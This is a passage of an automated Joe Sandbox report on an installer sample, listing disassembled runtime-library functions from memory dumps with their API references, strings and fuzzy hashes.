Function 003B041C Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 5d6fe426a8b5fafea817b616cca50a81fdb924956d720f187276ad537caca4d7
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 7BC18F73D0E5F2498B3B452D04183BFEE616E81B8831BC391DED43F989CA27AD1599D0

Function 003B007E Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 6832a8316c24b7048a88756ab67a923a22bffa2497096e30f24f85f014cb0326
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 32B1B733D0A5F24A877B412E44583BFEEA26E91B8831FC391CDD43F999C6279D0596D0

Function 02EE1628 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3671240808.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ed0000_103-o_Installer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction ID: 50e7ff81c99bb5d4346660dedc50dc25b8d3fc3827506e7791932f910191457d
Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction Fuzzy Hash: 90F06D72240205AFCF158F48DC41EAA77E9EF08364B488069FD0ADB221E331FD609BC0

Function 003A1671 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644

Function 003A98E5 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,003A5A5E), ref: 003A98ED
__mtterm.LIBCMT ref: 003A98F9

Part of subcall function 003A9632: DecodePointer.KERNEL32(00000002,003A9A5B,?,003A5A5E), ref: 003A9643
Part of subcall function 003A9632: TlsFree.KERNEL32(00000002,003A9A5B,?,003A5A5E), ref: 003A965D
Part of subcall function 003A9632: DeleteCriticalSection.KERNEL32(00000000,00000000,77755810,?,003A9A5B,?,003A5A5E), ref: 003AB6A4
Part of subcall function 003A9632: _free.LIBCMT ref: 003AB6A7
Part of subcall function 003A9632: DeleteCriticalSection.KERNEL32(00000002,77755810,?,003A9A5B,?,003A5A5E), ref: 003AB6CE

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003A990F
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003A991C
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003A9929
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003A9936
TlsAlloc.KERNEL32(?,003A5A5E), ref: 003A9986
TlsSetValue.KERNEL32(00000000,?,003A5A5E), ref: 003A99A1
__init_pointers.LIBCMT ref: 003A99AB
EncodePointer.KERNEL32(?,003A5A5E), ref: 003A99BC
EncodePointer.KERNEL32(?,003A5A5E), ref: 003A99C9
EncodePointer.KERNEL32(?,003A5A5E), ref: 003A99D6
EncodePointer.KERNEL32(?,003A5A5E), ref: 003A99E3
DecodePointer.KERNEL32(003A97B6,?,003A5A5E), ref: 003A9A04
__calloc_crt.LIBCMT ref: 003A9A19
DecodePointer.KERNEL32(00000000,?,003A5A5E), ref: 003A9A33
GetCurrentThreadId.KERNEL32 ref: 003A9A45

Strings

FlsSetValue, xrefs: 003A991E
FlsGetValue, xrefs: 003A9911
FlsFree, xrefs: 003A992B
KERNEL32.DLL, xrefs: 003A98E8
FlsAlloc, xrefs: 003A9909

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 9cf8f55c1e5c1bc4935b110efedad1de4a35933f1800aa6e3ae79e6fa21a2cc2
Instruction ID: fbaff2ff666ac43f29e5e9ddcdb3d0f90b3a9e26e9d53ad7aa8ee7a906974747
Opcode Fuzzy Hash: 9cf8f55c1e5c1bc4935b110efedad1de4a35933f1800aa6e3ae79e6fa21a2cc2
Instruction Fuzzy Hash: 1D318471901750DEEB27AF75AC0AF5A3BACEB86364F01061BE624E61B1DB35A840CF50

Function 003A235F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003A2364
std::_Lockit::_Lockit.LIBCPMT ref: 003A2373
int.LIBCPMT ref: 003A238A

Part of subcall function 003A1035: std::_Lockit::_Lockit.LIBCPMT ref: 003A1046

std::bad_exception::bad_exception.LIBCMT ref: 003A23C1
__CxxThrowException@8.LIBCMT ref: 003A23CF
std::locale::facet::_Incref.LIBCPMT ref: 003A23DF
std::locale::facet::_Facet_Register.LIBCPMT ref: 003A23E5

Strings

P+t, xrefs: 003A2378, 003A23D9
bad cast, xrefs: 003A23B9

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
String ID: P+t$bad cast
API String ID: 878426289-486246024
Opcode ID: 0ae37dad237168dc9bb41dca3c703872d5f26dee6d63a09434c44d1252cfff87
Instruction ID: 6787670d1a12857793f8a5c21632bf9068397c61c4a0368f6d6242d4cac1985d
Opcode Fuzzy Hash: 0ae37dad237168dc9bb41dca3c703872d5f26dee6d63a09434c44d1252cfff87
Instruction Fuzzy Hash: D0115E36900214ABCF0BFB64DC42AEEB375EB93724F150619F511AB2D1DB749A058B90

Function 003A1E2E Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003A1E33
std::_Lockit::_Lockit.LIBCPMT ref: 003A1E42
int.LIBCPMT ref: 003A1E59

Part of subcall function 003A1035: std::_Lockit::_Lockit.LIBCPMT ref: 003A1046

std::bad_exception::bad_exception.LIBCMT ref: 003A1E90
__CxxThrowException@8.LIBCMT ref: 003A1E9E
std::locale::facet::_Incref.LIBCPMT ref: 003A1EAE
std::locale::facet::_Facet_Register.LIBCPMT ref: 003A1EB4

Strings

*t, xrefs: 003A1E47, 003A1EA8
bad cast, xrefs: 003A1E88

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast$*t
API String ID: 878426289-263781451
Opcode ID: 0c4b1c68ed757d0be1e42a5d9de456790eeb9422f1d5aa828ab14f81c3409c62
Instruction ID: 5b50034053f930b17b97dcffe71f0127b3c5bda854c9210de2933a04609981d7
Opcode Fuzzy Hash: 0c4b1c68ed757d0be1e42a5d9de456790eeb9422f1d5aa828ab14f81c3409c62
Instruction Fuzzy Hash: A5117036901214ABCF07FB60D942EEEB375EB92725F150219F521AB1D1DF749A05CB90

Function 003A966F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,003BD638,00000008,003A9777,00000000,00000000,?,?,003AA964,003A4478,?,?,003A3C7B,?,?,003A101C), ref: 003A9680
__lock.LIBCMT ref: 003A96B4

Part of subcall function 003AB7B7: __mtinitlocknum.LIBCMT ref: 003AB7CD
Part of subcall function 003AB7B7: __amsg_exit.LIBCMT ref: 003AB7D9
Part of subcall function 003AB7B7: EnterCriticalSection.KERNEL32(00000000,00000000,?,003A96B9,0000000D), ref: 003AB7E1

InterlockedIncrement.KERNEL32(?), ref: 003A96C1
__lock.LIBCMT ref: 003A96D5
___addlocaleref.LIBCMT ref: 003A96F3

Strings

`+t, xrefs: 003A96E8
KERNEL32.DLL, xrefs: 003A967B

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL$`+t
API String ID: 637971194-3896753724
Opcode ID: 9c10ddafa6198fb33dd6fb9f5f19326fa3899f8b67cf0d58ebdf079c77c42e29
Instruction ID: afb935e1b304be706edeb12eceecb5ab49a423e8ffdc36fbb0c1a6b3b0cd2a4d
Opcode Fuzzy Hash: 9c10ddafa6198fb33dd6fb9f5f19326fa3899f8b67cf0d58ebdf079c77c42e29
Instruction Fuzzy Hash: 64018471804B00DFD722EF69C845789FBF0EF51324F10850EE59A5A7A1CBB4A644CF11

Function 003A7413 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 003A741A

Part of subcall function 003A9723: GetLastError.KERNEL32(?,?,003AA964,003A4478,?,?,003A3C7B,?,?,003A101C), ref: 003A9727
Part of subcall function 003A9723: ___set_flsgetvalue.LIBCMT ref: 003A9735
Part of subcall function 003A9723: __calloc_crt.LIBCMT ref: 003A9749
Part of subcall function 003A9723: DecodePointer.KERNEL32(00000000,?,?,003AA964,003A4478,?,?,003A3C7B,?,?,003A101C), ref: 003A9763
Part of subcall function 003A9723: GetCurrentThreadId.KERNEL32 ref: 003A9779
Part of subcall function 003A9723: SetLastError.KERNEL32(00000000,?,?,003AA964,003A4478,?,?,003A3C7B,?,?,003A101C), ref: 003A9791

__calloc_crt.LIBCMT ref: 003A743C
__get_sys_err_msg.LIBCMT ref: 003A745A
_strcpy_s.LIBCMT ref: 003A7462
__invoke_watson.LIBCMT ref: 003A7477

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 003A7427, 003A744A

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: d398f9e326d4990174e20396f29627e1f575688989bdefddc5a666a58dff91ef
Instruction ID: c75e722275470650eefe15aa5e5863a025fa6cf9463a733c71e1b2eabadf008d
Opcode Fuzzy Hash: d398f9e326d4990174e20396f29627e1f575688989bdefddc5a666a58dff91ef
Instruction Fuzzy Hash: 38F0E07A50C21067DB23392B5CC196B7B9CDB8B768B15047AF745DF541ED219C0182D5

Function 003A1A81 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003A1A86
std::_Lockit::_Lockit.LIBCPMT ref: 003A1A98
std::exception::exception.LIBCMT ref: 003A1ACF

Part of subcall function 003A3C86: std::exception::_Copy_str.LIBCMT ref: 003A3CA1

__CxxThrowException@8.LIBCMT ref: 003A1AE4

Part of subcall function 003A450C: RaiseException.KERNEL32(?,?,003A13AC,?,?,?,?,?,003A13AC,?,003BCCE8,00000000), ref: 003A454E

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003A1AED

Strings

bad locale name, xrefs: 003A1AC8

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 446407826-1405518554
Opcode ID: 25c5ddc640dfe3031481023e04622b6a79fabba8bcf8d1622943c1c9dfe9988b
Instruction ID: cf59d553ca1ad8aa3aac00aa03c771d2fd204a4220e2611a720888292e7d2b85
Opcode Fuzzy Hash: 25c5ddc640dfe3031481023e04622b6a79fabba8bcf8d1622943c1c9dfe9988b
Instruction Fuzzy Hash: 0D016DB6805744AECB22EF99C4805CFFFB8FB1A304B40852FE65997641C7749708CBA5

Function 003A76D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 003A76F1

Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC

__getptd.LIBCMT ref: 003A7702
__getptd.LIBCMT ref: 003A7710

Strings

MOC, xrefs: 003A76E3
RCC, xrefs: 003A76DC
csm, xrefs: 003A76EA

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
Instruction ID: 79d0e939211720335e8c3af78a544c68544c36d5773b5f60a5f543cfb7e4eddf
Opcode Fuzzy Hash: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
Instruction Fuzzy Hash: E8E09A351181048FDF23AB68C48AB797798EB4A315F5F54A2E40DCB232C73AED509A92

Function 003A7993 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 003A79BB

Part of subcall function 003A4842: __getptd.LIBCMT ref: 003A4850
Part of subcall function 003A4842: __getptd.LIBCMT ref: 003A485E

__getptd.LIBCMT ref: 003A79C5

Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC

__getptd.LIBCMT ref: 003A79D3
__getptd.LIBCMT ref: 003A79E1
__getptd.LIBCMT ref: 003A79EC
_CallCatchBlock2.LIBCMT ref: 003A7A12

Part of subcall function 003A48E7: __CallSettingFrame@12.LIBCMT ref: 003A4933

Part of subcall function 003A7AB9: __getptd.LIBCMT ref: 003A7AC8
Part of subcall function 003A7AB9: __getptd.LIBCMT ref: 003A7AD6

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 6e64b352859d7320df30e708aad6a0255c9360a7e17b4ae242c315dda40e0762
Instruction ID: 46442e78a2427365a18df556f87ec1f1639c19fd982db8d18ec73f4ae237a428
Opcode Fuzzy Hash: 6e64b352859d7320df30e708aad6a0255c9360a7e17b4ae242c315dda40e0762
Instruction Fuzzy Hash: D811F6B5C00209DFDF01EFA4D846BEE7BB4FF05314F14846AF814AB251DB799A119B64

Function 003AD224 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 003AD230

Part of subcall function 003A979C: __getptd_noexit.LIBCMT ref: 003A979F
Part of subcall function 003A979C: __amsg_exit.LIBCMT ref: 003A97AC

__amsg_exit.LIBCMT ref: 003AD250
__lock.LIBCMT ref: 003AD260
InterlockedDecrement.KERNEL32(?), ref: 003AD27D
_free.LIBCMT ref: 003AD290
InterlockedIncrement.KERNEL32(00741690), ref: 003AD2A8

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 7dc4b6887d4c7fc6c3efa2ab26b4cab1e8451b35eaf233b623ebd366cdd5b78a
Instruction ID: 6a2691dc2dab8d460baa4ca09767a2dbd45be46dacd825f9a147237abfb80f36
Opcode Fuzzy Hash: 7dc4b6887d4c7fc6c3efa2ab26b4cab1e8451b35eaf233b623ebd366cdd5b78a
Instruction Fuzzy Hash: AD012233D017209BDB23AF28884179DB3A4FF0A725F064515E926ABA92CB74DD81CBD1

Function 003A1B06 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003A1B0B
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003A1B1F

Part of subcall function 003A32F5: _setlocale.LIBCMT ref: 003A3307

_free.LIBCMT ref: 003A1B2D

Part of subcall function 003A4452: HeapFree.KERNEL32(00000000,00000000,?,003A3C7B,?,?,003A101C), ref: 003A4468
Part of subcall function 003A4452: GetLastError.KERNEL32(?,?,003A3C7B,?,?,003A101C), ref: 003A447A

_free.LIBCMT ref: 003A1B3F
_free.LIBCMT ref: 003A1B51
_free.LIBCMT ref: 003A1B63

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 770894815-0
Opcode ID: 1351fe3b39953cb4e7b3a6e7dd7d2098fa2dbabe49d0c490f1ef3befa7c8247d
Instruction ID: d8914a0c7d931b0517f7c7d99bc46fbc0d40bcee1d0d4e56c927553dd931ea1f
Opcode Fuzzy Hash: 1351fe3b39953cb4e7b3a6e7dd7d2098fa2dbabe49d0c490f1ef3befa7c8247d
Instruction Fuzzy Hash: F5015E316007009BDB26AF69D506B9BB3E8FF06724F10891EE065DB580DFB8D9048A61

Function 003A153B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 003A155A
std::exception::exception.LIBCMT ref: 003A157C

Strings

ios_base::eofbit set, xrefs: 003A1578, 003A15B4
ios_base::failbit set, xrefs: 003A15A4
ios_base::badbit set, xrefs: 003A156E

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: f415a03068c66869226fe43ccd95f5b7dd8ebcccd41452b3a77f9db5afb41ea9
Instruction ID: 3ddf96d88625556e51c27d6562b065f7dc23f7d462fc9bcd75b0a8392df39d6a
Opcode Fuzzy Hash: f415a03068c66869226fe43ccd95f5b7dd8ebcccd41452b3a77f9db5afb41ea9
Instruction Fuzzy Hash: 0B014CB1C00208AACB07EFA884066EE77E8DB83318F15C51AA6169F502E678CA05CF51

Function 003A7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 003A7D53

Part of subcall function 003A7CAE: ___BuildCatchObjectHelper.LIBCMT ref: 003A7CE4

_UnwindNestedFrames.LIBCMT ref: 003A7D6A
___FrameUnwindToState.LIBCMT ref: 003A7D78

Strings

csm, xrefs: 003A7D42
csm, xrefs: 003A7D4F, 003A7D64, 003A7D77, 003A7D95, 003A7DA5

Memory Dump Source

Source File: 00000000.00000002.3669010593.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.3668957298.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669080389.00000000003B9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669144588.00000000003BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669254440.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_103-o_Installer.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction ID: 211d680000540c96a98f7e19b8bfbded6e2f69e8ee891bf022d9ddcdb740c2bb
Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction Fuzzy Hash: CE01EF31405109BBDF23AF51CC86EAB7F6AEF4A360F144014BD1819222D7769AA1EBA1

Function 003ADE68 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 003ADE76

Part of subcall function 003A729E: __FF_MSGBANNER.LIBCMT ref: 003A72B7
Part of subcall function 003A729E: __NMSG_WRITE.LIBCMT ref: 003A72BE
Part of subcall function 003A729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,003A63C9,00000000,00000001,00000000,?,003AB742,00000018,003BD728,0000000C,003AB7D2), ref: 003A72E3

_free.LIBCMT ref: 003ADE89

Memory Dump Source

